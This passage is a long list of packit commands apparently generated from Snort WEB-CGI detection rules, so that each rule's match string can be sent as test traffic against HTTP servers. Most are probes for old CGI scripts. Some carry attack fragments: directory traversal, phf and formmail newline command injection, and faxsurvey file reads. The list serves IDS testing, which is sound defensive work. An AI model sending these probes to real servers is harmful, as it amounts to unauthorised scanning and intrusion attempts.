$HTTP_PORTS -p "/YaBB" # "WEB-CGI yabb access" nocase-ignored cve,CVE-2000-0853 arachnids,462 bugtraq,1668 classtype:attempted-recon sid:1637 packit -t TCP -s 
$EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/wwwboard/passwd.txt" # "WEB-CGI /wwwboard/passwd.txt access" nocase-ignored arachnids,463 cve,CVE-1999-0953 nessus,10321 bugtraq,649 classtype:attempted-recon sid:807 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/webdriver" # "WEB-CGI webdriver access" nocase-ignored arachnids,473 bugtraq,2166 nessus,10592 classtype:attempted-recon sid:808 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/whois_raw.cgi?" -p "" # "WEB-CGI whois_raw.cgi arbitrary command execution attempt" cve,CAN-1999-1063 arachnids,466 nessus,10306 classtype:web-application-attack sid:809 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/whois_raw.cgi" # "WEB-CGI whois_raw.cgi access" cve,CAN-1999-1063 arachnids,466 nessus,10306 classtype:attempted-recon sid:810 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p " /HTTP/1." # "WEB-CGI websitepro path access" nocase-ignored cve,CAN-2000-0066 arachnids,468 classtype:attempted-recon sid:811 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/webplus?about" # "WEB-CGI webplus version access" nocase-ignored cve,CVE-2000-0282 arachnids,470 classtype:attempted-recon sid:812 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/webplus?script" -p "../" # "WEB-CGI webplus directory traversal" nocase-ignored cve,CVE-2000-0282 arachnids,471 classtype:web-application-attack sid:813 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/websendmail" # "WEB-CGI websendmail access" nocase-ignored cve,CVE-1999-0196 arachnids,469 bugtraq,2077 nessus,10301 classtype:attempted-recon sid:815 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/dcforum.cgi" -p "forum=../.." 
# "WEB-CGI dcforum.cgi directory traversal attempt" cve,CAN-2001-0436 classtype:web-application-attack sid:1571 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/dcforum.cgi" # "WEB-CGI dcforum.cgi access" bugtraq,2728 classtype:attempted-recon sid:818 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/dcboard.cgi" -p "command=register" -p "%7cadmin" # "WEB-CGI dcboard.cgi invalid user addition attempt" bugtraq,2728 classtype:web-application-attack sid:817 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/dcboard.cgi" # "WEB-CGI dcboard.cgi access" bugtraq,2728 classtype:attempted-recon sid:1410 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/mmstdod.cgi" # "WEB-CGI mmstdod.cgi access" nocase-ignored cve,CVE-2001-0021 classtype:attempted-recon sid:819 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/apexec.pl" -p "template=../" # "WEB-CGI anaconda directory transversal attempt" nocase-ignored cve,CVE-2000-0975 bugtraq,2388 classtype:web-application-attack sid:820 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/imagemap.exe?" 
# "WEB-CGI imagemap.exe overflow attempt" nocase-ignored arachnids,412 cve,CVE-1999-0951 classtype:web-application-attack sid:821 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/imagemap.exe" # "WEB-CGI imagemap.exe access" nocase-ignored cve,CVE-1999-0951 arachnids,412 classtype:web-application-activity sid:1700 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/cvsweb.cgi" # "WEB-CGI cvsweb.cgi access" nocase-ignored cve,CVE-2000-0670 bugtraq,1469 classtype:attempted-recon sid:823 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/php.cgi" # "WEB-CGI php.cgi access" nocase-ignored cve,CAN-1999-0238 bugtraq,2250 arachnids,232 classtype:attempted-recon sid:824 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/glimpse" # "WEB-CGI glimpse access" nocase-ignored bugtraq,2026 classtype:attempted-recon sid:825 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/htmlscript?../.." # "WEB-CGI htmlscript attempt" nocase-ignored bugtraq,2001 cve,CVE-1999-0264 classtype:web-application-attack sid:1608 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/htmlscript" # "WEB-CGI htmlscript access" nocase-ignored bugtraq,2001 cve,CVE-1999-0264 classtype:attempted-recon sid:826 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/info2www" # "WEB-CGI info2www access" nocase-ignored bugtraq,1995 cve,CVE-1999-0266 classtype:attempted-recon sid:827 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/maillist.pl" # "WEB-CGI maillist.pl access" nocase-ignored classtype:attempted-recon sid:828 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/nph-test-cgi" # "WEB-CGI nph-test-cgi access" nocase-ignored nessus,10165 arachnids,224 cve,CVE-1999-0045 bugtraq,686 classtype:attempted-recon sid:829 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/nph-maillist.pl" # "WEB-CGI NPH-publish access" nocase-ignored 
cve,CAN-2001-0400 classtype:attempted-recon sid:1451 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/nph-publish" # "WEB-CGI NPH-publish access" nocase-ignored cve,CAN-1999-1177 classtype:attempted-recon sid:830 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/rguest.exe" # "WEB-CGI rguest.exe access" nocase-ignored cve,CAN-1999-0467 bugtraq,2024 classtype:attempted-recon sid:833 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/rwwwshell.pl" # "WEB-CGI rwwwshell.pl access" nocase-ignored url,www.itsecurity.com/papers/p37.htm classtype:attempted-recon sid:834 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/test-cgi/*?*" # "WEB-CGI test-cgi attempt" nocase-ignored nessus,10282 cve,CVE-1999-0070 arachnids,218 classtype:web-application-attack sid:1644 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/test-cgi" # "WEB-CGI test-cgi access" nocase-ignored nessus,10282 cve,CVE-1999-0070 arachnids,218 classtype:attempted-recon sid:835 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/testcgi" # "WEB-CGI testcgi access" nocase-ignored nessus,11610 bugtraq,7214 classtype:web-application-activity sid:1645 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/test.cgi" # "WEB-CGI test.cgi access" nocase-ignored classtype:web-application-activity sid:1646 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/textcounter.pl" # "WEB-CGI textcounter.pl access" nocase-ignored cve,CAN-1999-1479 classtype:attempted-recon sid:836 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/uploader.exe" # "WEB-CGI uploader.exe access" nocase-ignored cve,CVE-1999-0177 nessus,10291 classtype:attempted-recon sid:837 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/webgais" # "WEB-CGI webgais access" nocase-ignored arachnids,472 bugtraq,2058 cve,CVE-1999-0176 nessus,10300 classtype:attempted-recon sid:838 packit -t 
TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/finger" # "WEB-CGI finger access" nocase-ignored arachnids,221 cve,CVE-1999-0612 nessus,10071 classtype:attempted-recon sid:839 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/perlshop.cgi" # "WEB-CGI perlshop.cgi access" nocase-ignored cve,CAN-1999-1374 classtype:attempted-recon sid:840 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/pfdisplay.cgi" # "WEB-CGI pfdisplay.cgi access" nocase-ignored bugtraq,64 cve,CVE-1999-0270 classtype:attempted-recon sid:841 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/aglimpse" # "WEB-CGI aglimpse access" nocase-ignored nessus,10095 cve,CVE-1999-0147 bugtraq,2026 classtype:attempted-recon sid:842 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/AnForm2" # "WEB-CGI anform2 access" nocase-ignored cve,CVE-1999-0066 arachnids,225 classtype:attempted-recon sid:843 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/args.bat" # "WEB-CGI args.bat access" nocase-ignored cve,CAN-1999-1374 classtype:attempted-recon sid:844 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/args.cmd" # "WEB-CGI args.cmd access" nocase-ignored cve,CAN-1999-1374 classtype:attempted-recon sid:1452 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/AT-admin.cgi" # "WEB-CGI AT-admin.cgi access" nocase-ignored cve,CAN-1999-1072 classtype:attempted-recon sid:845 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/AT-generated.cgi" # "WEB-CGI AT-generated.cgi access" nocase-ignored cve,CAN-1999-1072 classtype:attempted-recon sid:1453 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/bnbform.cgi" # "WEB-CGI bnbform.cgi access" nocase-ignored cve,CVE-1999-0937 bugtraq,1469 classtype:attempted-recon sid:846 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/campas" # "WEB-CGI campas access" nocase-ignored 
cve,CVE-1999-0146 bugtraq,1975 classtype:attempted-recon sid:847 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/view-source" -p "../" # "WEB-CGI view-source directory traversal" nocase-ignored nocase-ignored cve,CVE-1999-0174 classtype:web-application-attack sid:848 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/view-source" # "WEB-CGI view-source access" nocase-ignored cve,CVE-1999-0174 classtype:attempted-recon sid:849 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/wais.pl" # "WEB-CGI wais.pl access" nocase-ignored classtype:attempted-recon sid:850 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/wwwwais" # "WEB-CGI wwwwais access" nocase-ignored nessus,10597 cve,CAN-2001-0223 classtype:attempted-recon sid:1454 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/files.pl" # "WEB-CGI files.pl access" nocase-ignored cve,CAN-1999-1081 classtype:attempted-recon sid:851 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/wguest.exe" # "WEB-CGI wguest.exe access" nocase-ignored cve,CAN-1999-0467 bugtraq,2024 classtype:attempted-recon sid:852 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/wrap" # "WEB-CGI wrap access" nessus,10317 bugtraq,373 arachnids,234 cve,CVE-1999-0149 classtype:attempted-recon sid:853 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/classifieds.cgi" # "WEB-CGI classifieds.cgi access" nocase-ignored bugtraq,2020 cve,CVE-1999-0934 classtype:attempted-recon sid:854 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/environ.cgi" # "WEB-CGI environ.cgi access" nocase-ignored classtype:attempted-recon sid:856 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/faxsurvey?/" # "WEB-CGI faxsurvey attempt (full path)" nocase-ignored cve,CVE-1999-0262 bugtraq,2056 nessus,10067 classtype:web-application-attack sid:1647 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS 
--D $HTTP_PORTS -p "/faxsurvey?cat%20" # "WEB-CGI faxsurvey arbitrary file read attempt" nocase-ignored nessus,10067 cve,CVE-1999-0262 bugtraq,2056 classtype:web-application-attack sid:1609 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/faxsurvey" # "WEB-CGI faxsurvey access" nocase-ignored cve,CVE-1999-0262 bugtraq,2056 nessus,10067 classtype:web-application-activity sid:857 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/filemail.pl" # "WEB-CGI filemail access" nocase-ignored cve,CAN-1999-1154 classtype:attempted-recon sid:858 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/man.sh" # "WEB-CGI man.sh access" nocase-ignored cve,CAN-1999-1179 classtype:attempted-recon sid:859 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/snork.bat" # "WEB-CGI snork.bat access" nocase-ignored bugtraq,1053 cve,CVE-2000-0169 arachnids,220 classtype:attempted-recon sid:860 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/w3-msql/" # "WEB-CGI w3-msql access" nocase-ignored bugtraq,591 cve,CVE-1999-0276 arachnids,210 nessus,10296 cve,CVE-2000-0012 classtype:attempted-recon sid:861 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/day5datacopier.cgi" # "WEB-CGI day5datacopier.cgi access" nocase-ignored cve,CAN-1999-1232 classtype:attempted-recon sid:863 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/day5datanotifier.cgi" # "WEB-CGI day5datanotifier.cgi access" nocase-ignored cve,CAN-1999-1232 classtype:attempted-recon sid:864 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/post-query" # "WEB-CGI post-query access" nocase-ignored cve,CAN-2001-0291 classtype:attempted-recon sid:866 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/visadmin.exe" # "WEB-CGI visadmin.exe access" nocase-ignored bugtraq,1808 cve,CAN-1999-1970 nessus,10295 classtype:attempted-recon sid:867 packit -t TCP -s $EXTERNAL_NET -d 
$HTTP_SERVERS --D $HTTP_PORTS -p "/dumpenv.pl" # "WEB-CGI dumpenv.pl access" nocase-ignored cve,CAN-1999-1178 classtype:attempted-recon sid:869 #packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/calendar_admin.pl?config=|" #Cannot convert: check backslash escaping. "WEB-CGI calendar_admin.pl arbitrary command execution attempt" classtype:web-application-attack cve,CVE-2000-0432 sid:1536 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/calendar_admin.pl" # "WEB-CGI calendar_admin.pl access" classtype:web-application-activity cve,CVE-2000-0432 sid:1537 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/calendar-admin.pl" # "WEB-CGI calendar-admin.pl access" nocase-ignored bugtraq,1215 classtype:web-application-activity sid:1701 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/calender.pl" # "WEB-CGI calender.pl access" nocase-ignored cve,CVE-2000-0432 classtype:attempted-recon sid:1455 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/calendar" # "WEB-CGI calendar access" nocase-ignored classtype:attempted-recon sid:882 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/user_update_admin.pl" # "WEB-CGI user_update_admin.pl access" nocase-ignored cve,CVE-2000-0627 classtype:attempted-recon sid:1457 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/user_update_passwd.pl" # "WEB-CGI user_update_passwd.pl access" nocase-ignored cve,CVE-2000-0627 classtype:attempted-recon sid:1458 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/snorkerz.cmd" # "WEB-CGI snorkerz.cmd access" nocase-ignored classtype:attempted-recon sid:870 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/survey.cgi" # "WEB-CGI survey.cgi access" nocase-ignored bugtraq,1817 cve,CVE-1999-0936 classtype:attempted-recon sid:871 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "///" # "WEB-CGI scriptalias access" 
cve,CVE-1999-0236 bugtraq,2300 arachnids,227 classtype:attempted-recon sid:873 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/win-c-sample.exe" # "WEB-CGI win-c-sample.exe access" nocase-ignored bugtraq,2078 arachnids,231 cve,CVE-1999-0178 nessus,10008 classtype:attempted-recon sid:875 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/w3tvars.pm" # "WEB-CGI w3tvars.pm access" nocase-ignored classtype:attempted-recon sid:878 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/admin.pl" # "WEB-CGI admin.pl access" nocase-ignored url,online.securityfocus.com/archive/1/249355 bugtraq,3839 classtype:attempted-recon sid:879 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/LWGate" # "WEB-CGI LWGate access" nocase-ignored url,www.netspace.org/~dwb/lwgate/lwgate-history.html url,www.wiretrip.net/rfp/p/doc.asp/i2/d6.htm classtype:attempted-recon sid:880 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/archie" # "WEB-CGI archie access" nocase-ignored classtype:attempted-recon sid:881 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/flexform" # "WEB-CGI flexform access" nocase-ignored url,www.wiretrip.net/rfp/p/doc.asp/i2/d6.htm classtype:attempted-recon sid:883 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/formmail" -p "%0a" # "WEB-CGI formmail arbitrary command execution attempt" nocase-ignored nocase-ignored nessus,10782 nessus,10076 bugtraq,1187 cve,CVE-1999-0172 arachnids,226 classtype:web-application-attack sid:1610 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/formmail" # "WEB-CGI formmail access" nocase-ignored nessus,10782 nessus,10076 bugtraq,1187 cve,CVE-1999-0172 arachnids,226 classtype:web-application-activity sid:884 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/phf" -p "QALIAS" -p "%0a/" # "WEB-CGI phf arbitrary command execution attempt" nocase-ignored nocase-ignored 
bugtraq,629 arachnids,128 cve,CVE-1999-0067 classtype:web-application-attack sid:1762 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/phf" # "WEB-CGI phf access" nocase-ignored bugtraq,629 arachnids,128 cve,CVE-1999-0067 classtype:web-application-activity sid:886 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/www-sql" # "WEB-CGI www-sql access" nocase-ignored url,marc.theaimsgroup.com/?l=bugtraq&m=88704258804054&w=2 classtype:attempted-recon sid:887 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/wwwadmin.pl" # "WEB-CGI wwwadmin.pl access" nocase-ignored classtype:attempted-recon sid:888 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/ppdscgi.exe" # "WEB-CGI ppdscgi.exe access" nocase-ignored bugtraq,491 url,online.securityfocus.com/archive/1/16878 classtype:attempted-recon sid:889 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/sendform.cgi" # "WEB-CGI sendform.cgi access" nocase-ignored cve,CAN-2002-0710 bugtraq,5286 url,www.scn.org/help/sendform.txt classtype:attempted-recon sid:890 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/upload.pl" # "WEB-CGI upload.pl access" nocase-ignored classtype:attempted-recon sid:891 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/AnyForm2" # "WEB-CGI AnyForm2 access" nocase-ignored bugtraq,719 cve,CVE-1999-0066 classtype:attempted-recon sid:892 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/MachineInfo" # "WEB-CGI MachineInfo access" nocase-ignored cve,CAN-1999-1067 classtype:attempted-recon sid:893 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/bb-hist.sh?HISTFILE=../.." 
# "WEB-CGI bb-hist.sh attempt" nocase-ignored nessus,10025 cve,CAN-1999-1462 bugtraq,142 classtype:web-application-attack sid:1531 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/bb-hist.sh" # "WEB-CGI bb-hist.sh access" nocase-ignored nessus,10025 cve,CAN-1999-1462 bugtraq,142 classtype:attempted-recon sid:894 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/bb-histlog.sh" # "WEB-CGI bb-histlog.sh access" nocase-ignored bugtraq,142 cve,CAN-1999-1462 classtype:attempted-recon sid:1459 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/bb-histsvc.sh" # "WEB-CGI bb-histsvc.sh access" nocase-ignored bugtraq,142 cve,CAN-1999-1462 classtype:attempted-recon sid:1460 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/bb-hostsvc.sh?HOSTSVC?../.." # "WEB-CGI bb-hostscv.sh attempt" nocase-ignored nessus,10460 cve,CVE-2000-0638 classtype:web-application-attack sid:1532 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/bb-hostsvc.sh" # "WEB-CGI bb-hostscv.sh access" nocase-ignored nessus,10460 cve,CVE-2000-0638 classtype:web-application-activity sid:1533 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/bb-rep.sh" # "WEB-CGI bb-rep.sh access" nocase-ignored bugtraq,142 cve,CAN-1999-1462 classtype:attempted-recon sid:1461 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/bb-replog.sh" # "WEB-CGI bb-replog.sh access" nocase-ignored bugtraq,142 cve,CAN-1999-1462 classtype:attempted-recon sid:1462 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/redirect" # "WEB-CGI redirect access" nocase-ignored bugtraq,1179 cve,CVE-2000-0382 classtype:attempted-recon sid:895 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/way-board/way-board.cgi" -p "db=" -p "../.." 
# "WEB-CGI wayboard attempt" nocase-ignored bugtraq,2370 cve,CAN-2001-0214 classtype:web-application-attack sid:1397 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/way-board" # "WEB-CGI way-board access" nocase-ignored bugtraq,2370 cve,CAN-2001-0214 nessus,10610 classtype:web-application-activity sid:896 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/pals-cgi" -p "documentName=" # "WEB-CGI pals-cgi arbitrary file access attempt" nocase-ignored classtype:web-application-attack cve,CAN-2001-0217 bugtraq,2372 nessus,10611 sid:1222 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/pals-cgi" # "WEB-CGI pals-cgi access" nocase-ignored cve,CAN-2001-0216 cve,CAN-2001-0217 bugtraq,2372 nessus,10611 classtype:attempted-recon sid:897 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/commerce.cgi" -p "page=" -p "/../" # "WEB-CGI commerce.cgi arbitrary file access attempt" nocase-ignored nessus,10612 bugtraq,2361 cve,CAN-2001-0210 classtype:attempted-recon sid:1572 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/commerce.cgi" # "WEB-CGI commerce.cgi access" nocase-ignored nessus,10612 bugtraq,2361 cve,CAN-2001-0210 classtype:attempted-recon sid:898 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/sendtemp.pl" -p "templ=" # "WEB-CGI Amaya templates sendtemp.pl directory traversal attempt" nocase-ignored nocase-ignored bugtraq,2504 cve,CAN-2001-0272 classtype:web-application-attack sid:899 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/sendtemp.pl" # "WEB-CGI Amaya templates sendtemp.pl access" nocase-ignored bugtraq,2504 cve,CAN-2001-0272 classtype:web-application-activity sid:1702 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/webspirs.cgi" -p "../../" # "WEB-CGI webspirs.cgi directory traversal attempt" nocase-ignored nocase-ignored cve,CAN-2001-0211 bugtraq,2362 nessus,10616 classtype:web-application-attack 
sid:900 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/webspirs.cgi" # "WEB-CGI webspirs.cgi access" nocase-ignored cve,CAN-2001-0211 bugtraq,2362 nessus,10616 classtype:attempted-recon sid:901 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "tstisapi.dll" # "WEB-CGI tstisapi.dll access" nocase-ignored cve,CAN-2001-0302 classtype:attempted-recon sid:902 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/sendmessage.cgi" # "WEB-CGI sendmessage.cgi access" nocase-ignored classtype:attempted-recon sid:1308 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/lastlines.cgi" # "WEB-CGI lastlines.cgi access" nocase-ignored bugtraq,3755 bugtraq,3754 classtype:attempted-recon sid:1392 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/zml.cgi" -p "file=../" # "WEB-CGI zml.cgi attempt" cve,CAN-2001-1209 bugtraq,3759 classtype:web-application-activity sid:1395 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/zml.cgi" # "WEB-CGI zml.cgi access" cve,CAN-2001-1209 bugtraq,3759 classtype:web-application-activity sid:1396 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/publisher/search.cgi" -p "template=" # "WEB-CGI AHG search.cgi access" nocase-ignored nocase-ignored bugtraq,3985 classtype:web-application-activity sid:1405 packit -t TCP -s $EXTERNAL_NET -d $HTTP_SERVERS --D $HTTP_PORTS -p "/store/agora.cgi?cart_id=